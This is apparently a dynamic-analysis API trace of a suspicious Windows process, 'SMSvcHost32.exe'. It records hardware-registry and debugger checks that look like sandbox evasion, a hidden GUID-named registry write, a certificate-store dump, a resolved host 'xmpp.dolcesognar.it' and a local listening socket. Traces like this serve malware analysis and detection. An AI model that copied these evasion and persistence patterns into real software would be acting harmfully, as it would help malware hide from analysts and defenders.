	[0107.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="winrnr.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winrnr.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.581] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.582] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0107.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0107.583] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0107.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0107.584] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntmarta.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntmarta.dll", lpUsedDefaultChar=0x0) returned 32
	[0107.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntmarta.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntmarta.dll", lpUsedDefaultChar=0x0) returned 12
	[0107.585] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 1
	[0107.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\ncryptprov.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\ncryptprov.dll", lpUsedDefaultChar=0x0) returned 35
	[0107.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ncryptprov.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncryptprov.dll", lpUsedDefaultChar=0x0) returned 15
	[0107.586] Module32NextW (hSnapshot=0x898, lpme=0x20af280) returned 0
	[0107.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 16
	[0107.587] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x934, pcPriClassBase=8, dwFlags=0x0, szExeFile="SMSvcHost32.exe")) returned 0
	[0107.588] CloseHandle (hObject=0x7e4) returned 1
	[0107.589] GetEnvironmentVariableW (in: lpName="USERDOMAIN", lpBuffer=0x209f85c, nSize=0x7fff | out: lpBuffer="X2VS1CUM") returned 0x8
	[0107.589] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x26d4f2c, lpdwDisposition=0x0 | out: phkResult=0x26d4f2c*=0x7e4, lpdwDisposition=0x0) returned 0x0
	[0107.589] RegQueryValueExW (in: hKey=0x7e4, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x20af8bc, lpData=0x0, lpcbData=0x20af898*=0x26d4f20 | out: lpType=0x20af8bc*=0x7, lpData=0x0, lpcbData=0x20af898*=0xec) returned 0x0
	[0107.590] RegQueryValueExW (in: hKey=0x7e4, lpValueName="SystemBiosVersion", lpReserved=0x0, lpType=0x20af8bc, lpData=0x25a0348, lpcbData=0x20af898*=0xec | out: lpType=0x20af8bc*=0x7, lpData=0x25a0348*, lpcbData=0x20af898*=0xec) returned 0x0
	[0107.590] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Enum\\IDE", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x26d516c, lpdwDisposition=0x0 | out: phkResult=0x26d516c*=0x0, lpdwDisposition=0x0) returned 0x5
	[0107.590] FormatMessageA (in: dwFlags=0x11ff, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x20af7f4, nSize=0x100, Arguments=0x0 | out: lpBuffer="@Om\x02lQm\x02S\x8d\x01\x04¼ø\n\x02") returned 0x12
	[0107.643] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Enum\\IDE", ulOptions=0x0, samDesired=0x20019, phkResult=0x20af830 | out: phkResult=0x20af830*=0x0) returned 0x2
	[0107.643] GetLastError () returned 0x0
	[0107.644] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Enum\\SCSI", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x26d508c, lpdwDisposition=0x0 | out: phkResult=0x26d508c*=0x89c, lpdwDisposition=0x0) returned 0x0
	[0107.644] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Enum\\SCSI", ulOptions=0x0, samDesired=0x20019, phkResult=0x20af830 | out: phkResult=0x20af830*=0x8a0) returned 0x0
	[0107.644] RegQueryInfoKeyW (in: hKey=0x8a0, lpClass=0x20af3cc, lpcchClass=0x20af828, lpReserved=0x0, lpcSubKeys=0x20af834, lpcbMaxSubKeyLen=0x20af810, lpcbMaxClassLen=0x20af814, lpcValues=0x20af854, lpcbMaxValueNameLen=0x20af820, lpcbMaxValueLen=0x20af808, lpcbSecurityDescriptor=0x20af80c, lpftLastWriteTime=0x20af818 | out: lpClass="", lpcchClass=0x20af828, lpcSubKeys=0x20af834*=0x3, lpcbMaxSubKeyLen=0x20af810, lpcbMaxClassLen=0x20af814, lpcValues=0x20af854*=0x0, lpcbMaxValueNameLen=0x20af820, lpcbMaxValueLen=0x20af808, lpcbSecurityDescriptor=0x20af80c, lpftLastWriteTime=0x20af818) returned 0x0
	[0107.644] RegEnumKeyExW (in: hKey=0x8a0, dwIndex=0x0, lpName=0x20af5d4, lpcchName=0x20af824, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20af818 | out: lpName="CdRom&Ven_LG&Prod_GTA0N", lpcchName=0x20af824, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20af818) returned 0x0
	[0107.644] RegEnumKeyExW (in: hKey=0x8a0, dwIndex=0x1, lpName=0x20af5d4, lpcchName=0x20af824, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20af818 | out: lpName="CdRom&Ven_LiteOn&Prod_DS-8ABSH", lpcchName=0x20af824, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20af818) returned 0x0
	[0107.645] RegEnumKeyExW (in: hKey=0x8a0, dwIndex=0x2, lpName=0x20af5d4, lpcchName=0x20af824, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20af818 | out: lpName="Disk&Ven_&Prod_WDBMYH5000ANC", lpcchName=0x20af824, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x20af818) returned 0x0
	[0107.645] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f84c, nSize=0x7fff | out: lpBuffer="\x4bd0\x25b\x2b04\x52\x3ac8\x52\x4bf8\x25b\x58\x32\x56\x53\x31\x43\x55\x4d") returned 0x0
	[0107.645] GetLastError () returned 0xcb
	[0107.645] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f84c, nSize=0x7fff | out: lpBuffer="\x4bd0\x25b\x2b04\x52\x3ac8\x52\x4bf8\x25b\x58\x32\x56\x53\x31\x43\x55\x4d") returned 0x0
	[0107.645] GetLastError () returned 0xcb
	[0107.646] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f8f4, nSize=0x7fff | out: lpBuffer="") returned 0x0
	[0107.646] GetLastError () returned 0xcb
	[0107.646] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f8e4, nSize=0x7fff | out: lpBuffer="\x4bd0\x25b\x2aec\x52\x3ac8\x52\x4bf8\x25b") returned 0x0
	[0107.646] GetLastError () returned 0xcb
	[0107.647] RegOpenCurrentUser (in: samDesired=0xf003f, phkResult=0x26d4f50 | out: phkResult=0x26d4f50*=0x8a4) returned 0x0
	[0107.647] RegCreateKeyExW (in: hKey=0x8a4, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x1, lpSecurityAttributes=0x0, phkResult=0x26d4f4c, lpdwDisposition=0x0 | out: phkResult=0x26d4f4c*=0x8a8, lpdwDisposition=0x0) returned 0x0
	[0107.647] RegQueryValueExW (in: hKey=0x8a8, lpValueName="ProxyEnable", lpReserved=0x0, lpType=0x20af8f4, lpData=0x20af8f8, lpcbData=0x20af910*=0x4 | out: lpType=0x20af8f4*=0x4, lpData=0x20af8f8*=0x0, lpcbData=0x20af910*=0x4) returned 0x0
	[0107.647] RegQueryValueExW (in: hKey=0x8a8, lpValueName="ProxyServer", lpReserved=0x0, lpType=0x20af8b4, lpData=0x0, lpcbData=0x20af890*=0x26d4f40 | out: lpType=0x20af8b4*=0x0, lpData=0x0, lpcbData=0x20af890*=0x0) returned 0x2
	[0107.647] RegQueryValueExW (in: hKey=0x8a8, lpValueName="AutoConfigURL", lpReserved=0x0, lpType=0x20af8b4, lpData=0x0, lpcbData=0x20af890*=0x26d4f40 | out: lpType=0x20af8b4*=0x0, lpData=0x0, lpcbData=0x20af890*=0x0) returned 0x2
	[0107.647] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f8a4, nSize=0x7fff | out: lpBuffer="\x345d\x411\x4bd0\x25b\x2aec\x52\x3ac8\x52\x38ca\x3f8\xf958\x20a\x4bd0\x25b\xf8f0\x20a\x37d9\x3f8\xf968\x20a\x5220\x26d\x0a") returned 0x0
	[0107.647] GetLastError () returned 0xcb
	[0107.648] GetEnvironmentVariableW (in: lpName="httpPortOverride", lpBuffer=0x209f87c, nSize=0x7fff | out: lpBuffer="\x4bd0\x25b\xf8b0\x20a\x37d9\x3f8\xf8a4\x209\x51e0\x26d\x0a") returned 0x0
	[0107.648] GetLastError () returned 0xcb
	[0107.650] GetEnvironmentVariableW (in: lpName="httpsPortOverride", lpBuffer=0x209f87c, nSize=0x7fff | out: lpBuffer="\x4bd0\x25b\xf8b0\x20a\x37d9\x3f8\xf8a4\x209\x51e0\x26d\x0a") returned 0x0
	[0107.650] GetLastError () returned 0xcb
	[0107.653] _strcmpi (_Str1="binary", _Str2="utf8") returned -1
	[0107.653] _strcmpi (_Str1="binary", _Str2="utf-8") returned -1
	[0107.653] _strcmpi (_Str1="binary", _Str2="ascii") returned 1
	[0107.653] _strcmpi (_Str1="binary", _Str2="base64") returned 1
	[0107.653] _strcmpi (_Str1="binary", _Str2="ucs2") returned -1
	[0107.653] _strcmpi (_Str1="binary", _Str2="ucs-2") returned -1
	[0107.653] _strcmpi (_Str1="binary", _Str2="utf16le") returned -1
	[0107.653] _strcmpi (_Str1="binary", _Str2="utf-16le") returned -1
	[0107.653] _strcmpi (_Str1="binary", _Str2="binary") returned 0
	[0107.653] _strcmpi (_Str1="hex", _Str2="utf8") returned -1
	[0107.653] _strcmpi (_Str1="hex", _Str2="utf-8") returned -1
	[0107.653] _strcmpi (_Str1="hex", _Str2="ascii") returned 1
	[0107.653] _strcmpi (_Str1="hex", _Str2="base64") returned 1
	[0107.653] _strcmpi (_Str1="hex", _Str2="ucs2") returned -1
	[0107.653] _strcmpi (_Str1="hex", _Str2="ucs-2") returned -1
	[0107.653] _strcmpi (_Str1="hex", _Str2="utf16le") returned -1
	[0107.653] _strcmpi (_Str1="hex", _Str2="utf-16le") returned -1
	[0107.653] _strcmpi (_Str1="hex", _Str2="binary") returned 1
	[0107.653] _strcmpi (_Str1="hex", _Str2="buffer") returned 1
	[0107.653] _strcmpi (_Str1="hex", _Str2="hex") returned 0
	[0107.655] RegOpenCurrentUser (in: samDesired=0xf003f, phkResult=0x26d5830 | out: phkResult=0x26d5830*=0x8ac) returned 0x0
	[0107.655] RegCreateKeyExW (in: hKey=0x8ac, lpSubKey="SOFTWARE\\Microsoft", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x26d582c, lpdwDisposition=0x0 | out: phkResult=0x26d582c*=0x8b0, lpdwDisposition=0x0) returned 0x0
	[0107.655] RegQueryValueExW (in: hKey=0x8b0, lpValueName="{2dc03b67-bbe0-46f6-a506-c0799ccb1f6b}", lpReserved=0x0, lpType=0x20af8b0, lpData=0x0, lpcbData=0x0 | out: lpType=0x20af8b0*=0x0, lpData=0x0, lpcbData=0x0) returned 0x2
	[0107.655] _strcmpi (_Str1="utf8", _Str2="utf8") returned 0
	[0107.656] RegOpenCurrentUser (in: samDesired=0xf003f, phkResult=0x26d5a30 | out: phkResult=0x26d5a30*=0x8b4) returned 0x0
	[0107.656] RegCreateKeyExW (in: hKey=0x8b4, lpSubKey="SOFTWARE\\Microsoft", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x26d5a2c, lpdwDisposition=0x0 | out: phkResult=0x26d5a2c*=0x8b8, lpdwDisposition=0x0) returned 0x0
	[0107.656] RegSetValueExW (in: hKey=0x8b8, lpValueName="{2dc03b67-bbe0-46f6-a506-c0799ccb1f6b}", Reserved=0x0, dwType=0x3, lpData=0x2654e00*, cbData=0x14 | out: lpData=0x2654e00*) returned 0x0
	[0107.656] SCardEstablishContext (in: dwScope=0x0, pvReserved1=0x0, pvReserved2=0x0, phContext=0x44a6b04 | out: phContext=0x44a6b04) returned -2146435043
	[0107.944] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 1
	[0107.944] QueryPerformanceCounter (in: lpPerformanceCount=0x20af3f0 | out: lpPerformanceCount=0x20af3f0*=1819045100000) returned 1
	[0107.945] GetEnvironmentVariableW (in: lpName="debug_main", lpBuffer=0x209f87c, nSize=0x7fff | out: lpBuffer="\x4bd0\x25b\xf8b0\x20a\x37d9\x3f8\xf8a4\x209\x51e0\x26d\x0a") returned 0x0
	[0107.945] GetLastError () returned 0xcb
	[0107.948] GetEnvironmentVariableW (in: lpName="http_proxy", lpBuffer=0x209f724, nSize=0x7fff | out: lpBuffer="\xf768\x209") returned 0x0
	[0107.948] GetLastError () returned 0xcb
	[0107.951] GetEnvironmentVariableW (in: lpName="debug_tls", lpBuffer=0x209f584, nSize=0x7fff | out: lpBuffer="\xfbc\x413\xf62c\x209\xfffe\xffff\x0c") returned 0x0
	[0107.951] GetLastError () returned 0xcb
	[0107.956] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f4dc, nSize=0x7fff | out: lpBuffer="ը瞙") returned 0x0
	[0107.956] GetLastError () returned 0xcb
	[0107.956] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f4dc, nSize=0x7fff | out: lpBuffer="ը瞙") returned 0x0
	[0107.956] GetLastError () returned 0xcb
	[0107.956] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f5fc, nSize=0x7fff | out: lpBuffer="\xf8dc\x20a\xf658\x209\xf658\x209\x4be0\x25b\xdd09\x1760\x2b2c\x52\x2b0e\x413\x2b30\x52\xff54\x412\xf7a4\x20a\xf8dc\x20a\xf678\x209\x04") returned 0x0
	[0107.957] GetLastError () returned 0xcb
	[0107.957] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f604, nSize=0x7fff | out: lpBuffer="\xf658\x209\x4be0\x25b\xdd09\x1760\x2b2c\x52\x2b0e\x413\x2b30\x52\xff54\x412\xf7a4\x20a\xf8dc\x20a\xf678\x209\x04") returned 0x0
	[0107.957] GetLastError () returned 0xcb
	[0107.957] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f604, nSize=0x7fff | out: lpBuffer="\xf658\x209\x4be0\x25b\xdd09\x1760\x2b2c\x52\x2b0e\x413\x2b30\x52\xff54\x412\xf7a4\x20a\xf8dc\x20a\xf678\x209\x04") returned 0x0
	[0107.957] GetLastError () returned 0xcb
	[0107.962] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x40215fd, phModule=0x20aec68 | out: phModule=0x20aec68*=0x77960000) returned 1
	[0107.962] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0107.962] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20af0f4, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0107.962] IsDebuggerPresent () returned 0
	[0107.962] GetProcessWindowStation () returned 0x84
	[0107.962] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aec34, nLength=0xc, lpnLengthNeeded=0x20aec20 | out: pvInfo=0x20aec34, lpnLengthNeeded=0x20aec20) returned 1
	[0107.962] GetActiveWindow () returned 0x0
	[0107.962] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\timer.c\nLine: 37\n\nExpression: new_time >= loop->time\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0108.340] CertOpenStore (lpszStoreProvider=0x9, dwEncodingType=0x0, hCryptProv=0x0, dwFlags=0x18000, pvPara=0x43b9ee0) returned 0x26089b8
	[0108.342] CertEnumCertificatesInStore (hCertStore=0x26089b8, pPrevCertContext=0x0) returned 0x57afa8
	[0108.342] CertGetIntendedKeyUsage (in: dwCertEncodingType=0x10001, pCertInfo=0x26cce28, pbKeyUsage=0x20af6ef, cbKeyUsage=0x1 | out: pbKeyUsage=0x20af6ef) returned 1
	[0108.342] CertGetCertificateContextProperty (in: pCertContext=0x57afa8, dwPropId=0x2, pvData=0x0, pcbData=0x20af6e8 | out: pvData=0x0, pcbData=0x20af6e8) returned 1
	[0108.342] CryptBinaryToStringA (in: pbBinary=0x51bb8b8, cbBinary=0x38a, dwFlags=0x0, pszString=0x0, pcchString=0x20af6c8 | out: pszString=0x0, pcchString=0x20af6c8) returned 1
	[0108.343] LocalAlloc (uFlags=0x40, uBytes=0x518) returned 0x51bc238
	[0108.343] CryptBinaryToStringA (in: pbBinary=0x51bb8b8, cbBinary=0x38a, dwFlags=0x0, pszString=0x51bc238, pcchString=0x20af6c8 | out: pszString="-----BEGIN CERTIFICATE-----\r\nMIIDhjCCAu+gAwIBAgIQYQYnn5HeCIxLKFfWssdVEzANBgkqhkiG9w0BAQsFADBv\r\nMSIwIAYDVQQDExlBZGRUcnVzdCBFeHRlcm5hbCBDQSBSb290MSYwJAYDVQQLEx1B\r\nZGRUcnVzdCBFeHRlcm5hbCBUVFAgTmV0d29yazEUMBIGA1UEChMLQWRkVHJ1c3Qg\r\nQUIxCzAJBgNVBAYTAlNFMB4XDTE3MTIxMzE0MDIwNloXDTIwMTIxMzE0MDIwNlow\r\nbzEiMCAGA1UEAxMZQWRkVHJ1c3QgRXh0ZXJuYWwgQ0EgUm9vdDEmMCQGA1UECxMd\r\nQWRkVHJ1c3QgRXh0ZXJuYWwgVFRQIE5ldHdvcmsxFDASBgNVBAoTC0FkZFRydXN0\r\nIEFCMQswCQYDVQQGEwJTRTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAufIE\r\ntAJYwb1/I2ziVkmxDe1Zii2uMQnRhPkbne0D9DiJOdOOumaRaNPJe3cJh4HkQb3v\r\nY5pvTS8HIpA1kBELjnqOCUsZHVXilSbq/xpn9EW1SzB22Wo644JaIsED0lqKgiBd\r\npk/eUgcNXMnno60Bu9opT24SddywA4M91eBIkF8CAwEAAaOCASEwggEdMA4GA1Ud\r\nDwEB/wQEAwIBxjCBrwYDVR0lBIGnMIGkBgcrBgEFBQcDBggrBgEFBQcDAQYIKwYB\r\nBQUHAwIGCCsGAQUFBwMDBggrBgEFBQcDBAYIKwYBBQUHAwUGCCsGAQUFBwMGBggr\r\nBgEFBQcDBwYIKwYBBQUHAwgGCCsGAQUFBwMJBgkrBgEFBQcwAQUGCSsGAQUFBzAB\r\nAgYIKwYBBQUIAgIGBysGAQUCAwUGCisGAQQBgjcKAwEGCisGAQQBgjcKAwMwEgYD\r\nVR0TAQH/BAgwBgEB/wIBATBFBgNVHSAEPjA8MDoGDSsGAQQBgYcuCg4CAQIwKTAn\r\nBggrBgEFBQcCARYbaHR0cHM6Ly93d3cudGhhd3RlLmNvbS9jcHMAMA0GCSqGSIb3\r\nDQEBCwUAA4GBAIOGhV45eWqIH/l83Xf+qc7x6qLunF4/g7AbYrCY+IwH/nzbGqx1\r\n0C1vRi3D8Q5albkYsa77HPCrLoeHXsBCjkyGOeRGJ8zOnYOwh0WUaAgGZYIHE66N\r\nLX2CCMK9CyDntmtIG3gk82Xd0r3wNP4PrVrSHl9CpqJS3FtQn3N2Uud1\r\n-----END CERTIFICATE-----\r\n", pcchString=0x20af6c8) returned 1
	[0108.343] GetQueuedCompletionStatusEx (in: CompletionPort=0x398, lpCompletionPortEntries=0x20af408, ulCount=0x80, ulNumEntriesRemoved=0x20af3fc, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x20af408, ulNumEntriesRemoved=0x20af3fc) returned 0
	[0108.343] GetLastError () returned 0x102
	[0108.343] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x26bf468, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20
	[0108.343] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x26bf468, cbMultiByte=-1, lpWideCharStr=0x57b6f8, cchWideChar=20 | out: lpWideCharStr="xmpp.dolcesognar.it") returned 20
	[0108.343] RtlWakeConditionVariable (in: ConditionVariable=0x44a7ba8 | out: ConditionVariable=0x44a7ba8) 
	[0108.344] timeGetTime () returned 0x2e96b
	[0108.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af910 | out: lpSystemTimeAsFileTime=0x20af910*(dwLowDateTime=0x72296c93, dwHighDateTime=0x1d492ec)) 
	[0108.344] SetLastError (dwErrCode=0x0) 
	[0108.344] GetLastError () returned 0x0
	[0108.344] SetLastError (dwErrCode=0x0) 
	[0108.344] GetLastError () returned 0x0
	[0108.347] SetLastError (dwErrCode=0x0) 
	[0108.349] GetEnvironmentVariableW (in: lpName="NODE_UNIQUE_ID", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0
	[0108.349] GetLastError () returned 0xcb
	[0108.350] GetEnvironmentVariableW (in: lpName="NODE_CLUSTER_SCHED_POLICY", lpBuffer=0x209f6c4, nSize=0x7fff | out: lpBuffer="\x57a7\x411\xf6e4\x209\x4bd0\x25b\x3f61\x411\x2b2c\x52\x2b34\x52") returned 0x0
	[0108.350] GetLastError () returned 0xcb
	[0108.350] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7d4, nSize=0x7fff | out: lpBuffer="ը瞙") returned 0x0
	[0108.350] GetLastError () returned 0xcb
	[0108.351] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7e4, nSize=0x7fff | out: lpBuffer="\xf96c\x20a\xf7ec\x209\x40") returned 0x0
	[0108.351] GetLastError () returned 0xcb
	[0108.351] GetEnvironmentVariableW (in: lpName="debug_net", lpBuffer=0x209f7ac, nSize=0x7fff | out: lpBuffer="\x2b14\x52\x3ac8\x52\x38ca\x3f8\xf858\x20a\x4bd0\x25b\xf7f0\x20a\x37d9\x3f8\x2b14\x52\x5b80\x26d\x09") returned 0x0
	[0108.351] GetLastError () returned 0xcb
	[0108.351] htons (hostshort=0x119) returned 0x1901
	[0108.351] socket (af=2, type=1, protocol=0) returned 0x8fc
	[0108.351] ioctlsocket (in: s=0x8fc, cmd=-2147195266, argp=0x20af788 | out: argp=0x20af788) returned 0
	[0108.351] SetHandleInformation (hObject=0x8fc, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.352] CreateIoCompletionPort (FileHandle=0x8fc, ExistingCompletionPort=0x398, CompletionKey=0x8fc, NumberOfConcurrentThreads=0x0) returned 0x398
	[0108.352] SetFileCompletionNotificationModes (FileHandle=0x8fc, Flags=0x3) returned 1
	[0108.352] bind (s=0x8fc, addr=0x20af7d8*(sa_family=2, sin_port=0x119, sin_addr="127.0.0.1"), namelen=16) returned 0
	[0108.352] WSAIoctl (in: s=0x8fc, dwIoControlCode=0xc8000006, lpvInBuffer=0x20af7bc, cbInBuffer=0x10, lpvOutBuffer=0x51b3554, cbOutBuffer=0x4, lpcbBytesReturned=0x20af7b8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x51b3554, lpcbBytesReturned=0x20af7b8, lpOverlapped=0x0) returned 0
	[0108.352] listen (s=0x8fc, backlog=511) returned 0
	[0108.352] socket (af=2, type=1, protocol=0) returned 0x910
	[0108.353] SetHandleInformation (hObject=0x910, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.353] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x910, lpOutputBuffer=0x51c3c20, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c3c00 | out: lpOutputBuffer=0x51c3c20, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c3c00) returned 0
	[0108.353] GetLastError () returned 0x3e5
	[0108.353] socket (af=2, type=1, protocol=0) returned 0x914
	[0108.353] SetHandleInformation (hObject=0x914, dwMask=0x1, dwFlags=0x0) returned 1
	[0108.353] AcceptEx (in: sListenSocket=0x8fc, sAcceptSocket=0x914, lpOutputBuffer=0x51c3d8c, dwReceiveDataLength=0x0, dwLocalAddressLength=0x80, dwRemoteAddressLength=0x80, lpdwBytesReceived=0x20af7c8, lpOverlapped=0x51c3d6c | out: lpOutputBuffer=0x51c3d8c, lpdwBytesReceived=0x20af7c8*=0x51b34b0, lpOverlapped=0x51c3d6c) returned 0
	[0108.353] GetLastError () returned 0x3e5
	[0108.353] socket (af=2, type=1, protocol=0) returned 0x918
	[0108.353] SetHandleInformation (hObject=0x918, dwMask=0x1, dwFlags=0x0) returned 1
